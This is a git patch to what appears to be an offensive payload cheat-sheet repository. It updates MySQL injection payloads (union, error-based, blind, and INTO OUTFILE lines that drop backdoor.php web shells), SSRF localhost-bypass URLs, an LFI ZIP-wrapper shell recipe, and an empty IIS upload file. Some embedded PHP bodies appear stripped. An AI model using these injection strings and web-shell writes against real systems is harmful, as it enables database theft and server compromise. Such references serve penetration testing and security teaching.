From f740d8e825e3df37ef01590c4cb2578f15f18876 Mon Sep 17 00:00:00 2001 From: Swissky Date: Thu, 9 Nov 2017 09:05:50 +0100 Subject: [PATCH] MySQL - Code exec --- File Inclusion - Path Traversal/README.md | 2 +- SQL injection/MySQL Injection.md | 21 +++++++++++---------- SSRF injection/README.md | 8 ++++++++ Upload insecure files/IIS/index.stm | 14 ++++++++++++++ 4 files changed, 34 insertions(+), 11 deletions(-) create mode 100644 Upload insecure files/IIS/index.stm diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index b7e4565..e0de154 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md @@ -72,7 +72,7 @@ http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encod LFI Wrapper ZIP ```python -echo "" > payload.php; +echo "
" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 6d399f4..824bac1 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -1,6 +1,6 @@ # MYSQL Injection -##Detect columns number +## Detect columns number Using a simple ORDER ``` order by 1 @@ -10,7 +10,7 @@ order by 3 order by XXX ``` -##MySQL Union Based +## MySQL Union Based ``` UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=... @@ -18,13 +18,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_sc UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+... ``` -##MySQL Error Based - Basic +## MySQL Error Based - Basic ``` (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' ``` -##MYSQL Error Based - UpdateXML function +## MYSQL Error Based - UpdateXML function ``` AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)- AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)-- 
@@ -33,7 +33,7 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)-- ``` -##MYSQL Error Based - Extractvalue function +## MYSQL Error Based - Extractvalue function ``` AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))-- @@ -42,7 +42,7 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- ``` -##MYSQL Blind with MAKE_SET +## MYSQL Blind with MAKE_SET ``` AND MAKE_SET(YOLO<(SELECT(length(version()))),1) AND MAKE_SET(YOLO=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)# (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)# ``` -##MYSQL DROP SHELL +## MYSQL DROP SHELL ``` SELECT "" into outfile "C:\\xampp\\htdocs\\backdoor.php" SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY ' +-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php' ``` diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 3dfbdae..051d589 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -43,6 +43,14 @@ http://[::]:22/ SSH http://[::]:3128/ Squid ``` +``` +http://0000::1:80/ +http://0000::1:25/ SMTP +http://0000::1:22/ SSH +http://0000::1:3128/ Squid +``` + + Bypass localhost with a domain redirecting to locahost ``` http://n-pn.info 
diff --git a/Upload insecure files/IIS/index.stm b/Upload insecure files/IIS/index.stm
new file mode 100644
index 0000000..73111e8
--- /dev/null
+++ b/Upload insecure files/IIS/index.stm
@@ -0,0 +1,14 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+